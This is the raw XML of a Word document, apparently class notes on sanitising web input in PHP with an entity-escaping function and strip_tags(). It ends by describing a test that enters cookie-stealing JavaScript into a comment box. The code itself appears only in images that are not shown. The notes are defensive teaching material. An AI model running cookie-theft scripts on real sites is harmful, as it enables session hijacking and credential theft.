        <w:tabs>
          <w:tab w:val="left" w:pos="2136"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E507A0" w:rsidRDefault="00E507A0" w:rsidP="001801A4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2136"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E507A0" w:rsidRDefault="00E507A0" w:rsidP="001801A4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2136"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E507A0" w:rsidRDefault="00E507A0" w:rsidP="001801A4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2136"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>As you see here it turns &lt;&gt; into &amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r w:rsidR="00467751">
        <w:t>which</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> turns tags into plain text.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B633DE" w:rsidRDefault="002C65FF" w:rsidP="001801A4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2136"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IE"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251666432" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2FCE5CE2" wp14:editId="1ACE0A65">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-373380</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>324485</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3794760" cy="2575560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7ED9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575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633DE" w:rsidRPr="00B633DE">
        <w:t>strip_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00B633DE" w:rsidRPr="00B633DE">
        <w:t>tags</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B633DE" w:rsidRPr="00B633DE">
        <w:t>()</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00264BA0" w:rsidRDefault="002E0CBF" w:rsidP="002E0CBF">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2136"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00264BA0">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IE"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251667456" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="069C0125" wp14:editId="29E48A89">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-3802380</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>3643630</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3398520" cy="1844040"/>
            <wp:effectExtent l="76200" t="76200" r="125730" b="13716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F4A2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184404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BA0" w:rsidRPr="00264BA0" w:rsidRDefault="00264BA0" w:rsidP="00264BA0"/>
    <w:p w:rsidR="00264BA0" w:rsidRPr="00264BA0" w:rsidRDefault="00264BA0" w:rsidP="00264BA0"/>
    <w:p w:rsidR="00264BA0" w:rsidRPr="00264BA0" w:rsidRDefault="00264BA0" w:rsidP="00264BA0"/>
    <w:p w:rsidR="00264BA0" w:rsidRPr="00264BA0" w:rsidRDefault="00264BA0" w:rsidP="00264BA0"/>
    <w:p w:rsidR="00264BA0" w:rsidRPr="00264BA0" w:rsidRDefault="00264BA0" w:rsidP="00264BA0"/>
    <w:p w:rsidR="00264BA0" w:rsidRPr="00264BA0" w:rsidRDefault="00264BA0" w:rsidP="00264BA0"/>
    <w:p w:rsidR="00264BA0" w:rsidRPr="00264BA0" w:rsidRDefault="00264BA0" w:rsidP="00264BA0"/>
    <w:p w:rsidR="00264BA0" w:rsidRPr="00264BA0" w:rsidRDefault="00264BA0" w:rsidP="00264BA0"/>
    <w:p w:rsidR="00264BA0" w:rsidRDefault="00264BA0" w:rsidP="00264BA0"/>
    <w:p w:rsidR="00264BA0" w:rsidRDefault="00264BA0" w:rsidP="00264BA0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Strip away all html tags for just plain text</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00264BA0" w:rsidRPr="00264BA0" w:rsidRDefault="00264BA0" w:rsidP="00264BA0"/>
    <w:p w:rsidR="00264BA0" w:rsidRPr="00264BA0" w:rsidRDefault="00264BA0" w:rsidP="00264BA0"/>
    <w:p w:rsidR="00264BA0" w:rsidRPr="00264BA0" w:rsidRDefault="00264BA0" w:rsidP="00264BA0"/>
    <w:p w:rsidR="00264BA0" w:rsidRPr="00264BA0" w:rsidRDefault="00264BA0" w:rsidP="00264BA0"/>
    <w:p w:rsidR="00264BA0" w:rsidRPr="00264BA0" w:rsidRDefault="00264BA0" w:rsidP="00264BA0"/>
    <w:p w:rsidR="00264BA0" w:rsidRPr="00264BA0" w:rsidRDefault="00264BA0" w:rsidP="00264BA0"/>
    <w:p w:rsidR="00264BA0" w:rsidRDefault="00264BA0" w:rsidP="00264BA0"/>
    <w:p w:rsidR="002C65FF" w:rsidRDefault="00264BA0" w:rsidP="00264BA0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>If I wish to allow certain tags like &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00264BA0" w:rsidRDefault="00264BA0" w:rsidP="00264BA0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IE"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251668480" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3FDCEA0E" wp14:editId="190C0317">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>60960</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>125095</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2407920" cy="1303020"/>
            <wp:effectExtent l="76200" t="76200" r="125730" b="12573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9403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1303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4BA0" w:rsidRDefault="00264BA0" w:rsidP="00264BA0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00264BA0" w:rsidRPr="00264BA0" w:rsidRDefault="00264BA0" w:rsidP="00264BA0"/>
    <w:p w:rsidR="00264BA0" w:rsidRPr="00264BA0" w:rsidRDefault="00264BA0" w:rsidP="00264BA0"/>
    <w:p w:rsidR="00264BA0" w:rsidRDefault="00264BA0" w:rsidP="00264BA0"/>
    <w:p w:rsidR="00264BA0" w:rsidRDefault="00264BA0" w:rsidP="00264BA0"/>
    <w:p w:rsidR="00264BA0" w:rsidRDefault="00264BA0" w:rsidP="00264BA0"/>
    <w:p w:rsidR="00264BA0" w:rsidRDefault="00264BA0" w:rsidP="00264BA0"/>
    <w:p w:rsidR="00264BA0" w:rsidRDefault="00264BA0" w:rsidP="00264BA0">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IE"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A619C45">
            <wp:extent cx="3688715" cy="2761615"/>
            <wp:effectExtent l="0" t="0" r="6985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715" cy="27616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64BA0" w:rsidRPr="00264BA0" w:rsidRDefault="00264BA0" w:rsidP="00264BA0"/>
    <w:p w:rsidR="00264BA0" w:rsidRDefault="00264BA0" w:rsidP="00264BA0"/>
    <w:p w:rsidR="00264BA0" w:rsidRDefault="006B6472" w:rsidP="006B6472">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="936"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>Using both together</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B6472" w:rsidRDefault="006B6472" w:rsidP="006B6472">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="936"/>
        </w:tabs>
        <w:ind w:left="1656"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IE"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251669504" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="20BC6A4B" wp14:editId="774692A3">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>198120</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>220345</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3939540" cy="2705100"/>
            <wp:effectExtent l="0" t="0" r="381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7B64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B6472" w:rsidRPr="006B6472" w:rsidRDefault="006B6472" w:rsidP="006B6472"/>
    <w:p w:rsidR="006B6472" w:rsidRPr="006B6472" w:rsidRDefault="006B6472" w:rsidP="006B6472"/>
    <w:p w:rsidR="006B6472" w:rsidRPr="006B6472" w:rsidRDefault="006B6472" w:rsidP="006B6472"/>
    <w:p w:rsidR="006B6472" w:rsidRPr="006B6472" w:rsidRDefault="006B6472" w:rsidP="006B6472"/>
    <w:p w:rsidR="006B6472" w:rsidRPr="006B6472" w:rsidRDefault="006B6472" w:rsidP="006B6472"/>
    <w:p w:rsidR="006B6472" w:rsidRPr="006B6472" w:rsidRDefault="006B6472" w:rsidP="006B6472"/>
    <w:p w:rsidR="006B6472" w:rsidRPr="006B6472" w:rsidRDefault="006B6472" w:rsidP="006B6472"/>
    <w:p w:rsidR="006B6472" w:rsidRPr="006B6472" w:rsidRDefault="006B6472" w:rsidP="006B6472"/>
    <w:p w:rsidR="006B6472" w:rsidRPr="006B6472" w:rsidRDefault="006B6472" w:rsidP="006B6472"/>
    <w:p w:rsidR="006B6472" w:rsidRDefault="006B6472" w:rsidP="006B6472"/>
    <w:p w:rsidR="006B6472" w:rsidRDefault="006B6472" w:rsidP="006B6472">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3756"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B6472" w:rsidRDefault="006B6472" w:rsidP="006B6472">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3756"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006B6472" w:rsidRDefault="006B6472" w:rsidP="006B6472">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3756"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006B6472" w:rsidRDefault="006B6472" w:rsidP="006B6472">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3756"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006B6472" w:rsidRDefault="006B6472" w:rsidP="006B6472">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3756"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006B6472" w:rsidRPr="00B47DAF" w:rsidRDefault="006B6472" w:rsidP="006B6472">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B47DAF">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Try this solution on our commenting box and java script</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B47DAF" w:rsidRDefault="00B47DAF" w:rsidP="006B6472">
      <w:r>
        <w:t>We will try and renter java script code of retrieving cookie password and cookie username.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C3EE3" w:rsidRDefault="000C3EE3" w:rsidP="006B6472">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IE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77470</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="2193290"/>
            <wp:effectExtent l="76200" t="76200" r="135890" b="13081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8248.tmp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32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EE3" w:rsidRPr="000C3EE3" w:rsidRDefault="000C3EE3" w:rsidP="000C3EE3">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IE"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251670528" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="51931A68" wp14:editId="1368D928">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-60960</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>283210</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5730875" cy="1840865"/>
            <wp:effectExtent l="76200" t="76200" r="136525" b="140335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4086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EE3" w:rsidRPr="000C3EE3" w:rsidRDefault="000C3EE3" w:rsidP="000C3EE3"/>
    <w:p w:rsidR="00B47DAF" w:rsidRPr="000C3EE3" w:rsidRDefault="000C3EE3" w:rsidP="000C3EE3">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0BFA8C32" wp14:editId="25E10C4B">
            <wp:extent cx="5334462" cy="2339543"/>
            <wp:effectExtent l="0" t="0" r="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9C7441.tmp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233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7DAF" w:rsidRPr="000C3E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50DB8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FEACC1E4"/>
    <w:lvl w:ilvl="0" w:tplc="1809000F">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1452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1">
    <w:nsid w:val="47FB192D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="04E4F528"/>
    <w:lvl w:ilvl="0" w:tplc="18090001">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1656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376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3096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816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536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256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976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696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416" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2">
    <w:nsid w:val="5A220F7C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="675EE2F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1252B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D5280B96"/>
    <w:lvl w:ilvl="0" w:tplc="18090001">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1452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2172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892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3612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4332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5052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772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6492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7212" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="4">
    <w:nsid w:val="69495F21"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B7B8917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7ABD"/>
    <w:rsid w:val="000C3EE3"/>
    <w:rsid w:val="001801A4"/>
    <w:rsid w:val="001C5B62"/>
    <w:rsid w:val="00263600"/>
    <w:rsid w:val="00264BA0"/>
    <w:rsid w:val="00287ABD"/>
    <w:rsid w:val="002C65FF"/>
    <w:rsid w:val="002D2CED"/>
    <w:rsid w:val="002E0CBF"/>
    <w:rsid w:val="003F6B63"/>
    <w:rsid w:val="00467751"/>
    <w:rsid w:val="005A1600"/>
    <w:rsid w:val="006161CD"/>
    <w:rsid w:val="006B6472"/>
    <w:rsid w:val="00751231"/>
    <w:rsid w:val="007840CA"/>
    <w:rsid w:val="00784EE8"/>
    <w:rsid w:val="00955519"/>
    <w:rsid w:val="00B47DAF"/>
    <w:rsid w:val="00B633DE"/>
    <w:rsid w:val="00B829C9"/>
    <w:rsid w:val="00BD1FB7"/>
    <w:rsid w:val="00C95F9C"/>
    <w:rsid w:val="00E507A0"/>
    <w:rsid w:val="00F02B6E"/>
    <w:rsid w:val="00F247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F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647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87A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AB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F9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B647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image" Target="media/image1.png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/>
</file>

<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{EFBAFAB3-A44B-46DC-AB47-39BCEDA93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9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a</dc:creator>
  <cp:lastModifiedBy>Enda</cp:lastModifiedBy>
  <cp:revision>11</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-02-03T19:20:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-02-13T16:54:00Z</dcterms:modified>
</cp:coreProperties>
</file>